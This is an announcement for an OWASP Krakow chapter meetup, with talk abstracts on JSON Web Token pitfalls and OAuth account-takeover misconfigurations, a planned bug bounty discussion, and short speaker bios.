OWASP Meeting in Krakow - JWT, OAuth secrets & Bug bounty

Hi,
We are Polish chapter of OWASP - worldwide, non-profit organisation focused on application security issues.
This time we have invited Grzegorz Niedziela and Louis Nyffenegger.

Louis Nyffenegger the founder of PentesterLab, will talk about JSON Web Tokens (JWTs).
Grzegorz Niedziela, "Bug Bounty Reports Explained" Youtube channel host will have a talk about OAuth security.
After talks, we will discuss bright and dark sides of bug bounty.

Agenda:

1. JSON Web Tokens (JWTs) (Louis Nyffenegger)
   Nowadays, JSON Web Tokens (JWTs) are ubiquitous, serving as session tokens, OAuth tokens, or simply as a means to pass information between applications or microservices. However, by design, JWTs contain numerous security and cryptography pitfalls that can lead to serious vulnerabilities. In this talk, we will explore how to exploit some of these issues.
2. OAuth Secrets (Grzegorz Niedziela)
   These days, Oauth is a key protocol, allowing us to log in with one click to many websites. As anything, this convenience doesn’t come without a cost. The cost here is the risk of an account takeover bug. And that’s not only changing the redirect_uri to an attacker-controlled host which, for many hackers, is the only attack they know. That attack won't work too well in 2024. This talk will be about exploiting smaller misconfigurations. For example, what do to if you only control the path of the redirect_uri or how to exfiltrate the code when your open doesn't preserve parameters. It will also focus on particular auth providers and how they don't make it hard for us by being way more relaxed than the standard defines.
3. After the break, we will be hosting a discussion about bug boutnty. We want to discuss both sides - bug bounters and companies which have bug bounty programs.
   How to report vulnerabilities? Where to seek? What should be your goal - easy bugs occuring en masse or sophisticated kill-chains? What to expect? Bug bounty myths and reality.
   How bug bounty might help your organisation? What are the real costs of having bb program? What can go wrong? How to manage good bb program? Bug bounty or penetration testing?

About our guests:
Louis Nyffenegger is a seasoned security engineer and the founder of PentesterLab, a platform dedicated to teaching web penetration testing and security code review.
Grzegorz Niedziela - I'm a hacker who documents his journey by creating and curating the best content for you in the form of videos and newsletter.

Please RSVP and save the date!
If you have a minute, please share this invitation with friends and in your social media.